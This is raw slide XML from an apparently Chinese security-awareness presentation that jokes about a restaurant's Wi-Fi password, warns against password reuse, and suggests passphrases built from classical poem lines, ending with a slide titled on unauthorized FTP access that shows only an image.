              </a:rPr>
              <a:t>关</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>于此密码的故事：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>在酒店吃饭，问老板</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>WIFI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>密码，老板说</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>LYP82NLF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>我说这好难记，老板笑答“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>来一瓶</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>82</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>年拉菲</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，好记</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>!” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>我一边念“来一瓶</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>82</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>年拉菲”，一边输密码，刚输完，服务员问能打开了吗？我说能打开了。只听“嘭” 的一声，服务员笑着说：“您的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>82</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>年的拉菲，三万二千元，已替您打开了，谢谢！”瞬间千万头草泥马奔腾而过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>！</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8350424" y="1290831"/>
            <a:ext cx="2825576" cy="2254038"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1864862" y="5114530"/>
            <a:ext cx="4116838" cy="774443"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>小编深深的为酒店老板的智商所折服</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>真</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>是密码设的好，生活质量低不了！</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="Heiti SC Light"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="137766112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291353"/>
            <a:ext cx="2852063" cy="452432"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>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0x03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常见的网络安全类型</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1864862" y="816732"/>
            <a:ext cx="9679438" cy="5909310"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>登陆几十个网站的时意味着我们可能要记住几十个不同的字母、数字和符号的组合，例如“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>123321</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>！”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>所有密码都一样的就当小编什么都没说</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>装库的可能性就很大了。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>就是密码更长一些，但是记起来要容易得多。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>例如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>，把</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>密</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>123321!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>变</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>zwzybz9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>醉翁之意不在酒</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>。是不是感</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>觉</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>高大</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>上了有没有？</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>而</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>且口令句在网络安全方面非常有效</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>，因为黑客程序会因为密码长度带来的随机性而放弃</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Tree_0f0=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>("2_Bird_ff0/a")</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>解释：两个黄鹂鸣翠柳 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>csbt34.ydhl12s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>解释：池上碧苔三四点，叶底黄鹂一两</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>声</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>_$n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RenSheng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)_$n+="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>die“ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>解</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>释：人生自古谁无</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>死</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ps!see</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(5tl)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>shit!say</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(man)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>解释：平生不看武腾兰，便称男人也枉然</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="32770" name="Picture 2" descr="http://www.yzcun.com/uploads/allimg/160813/3-160Q3203450P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99605" y="1491338"/>
            <a:ext cx="2064396" cy="2064397"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" xmlns="">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="32778" name="Picture 10" descr="http://wanzao2.b0.upaiyun.com/system/pictures/25723942/original/1436681386_500x500.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420100" y="4558789"/>
            <a:ext cx="2970726" cy="207061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6"/>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54225" y="1491337"/>
            <a:ext cx="5528968" cy="2064398"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="739473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563248" cy="417358"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">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0x4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4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1864862" y="1012505"/>
            <a:ext cx="5259772" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>未授</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>权</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>访问 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FTP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1928594" y="1892898"/>
            <a:ext cx="4925211" cy="4262201"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
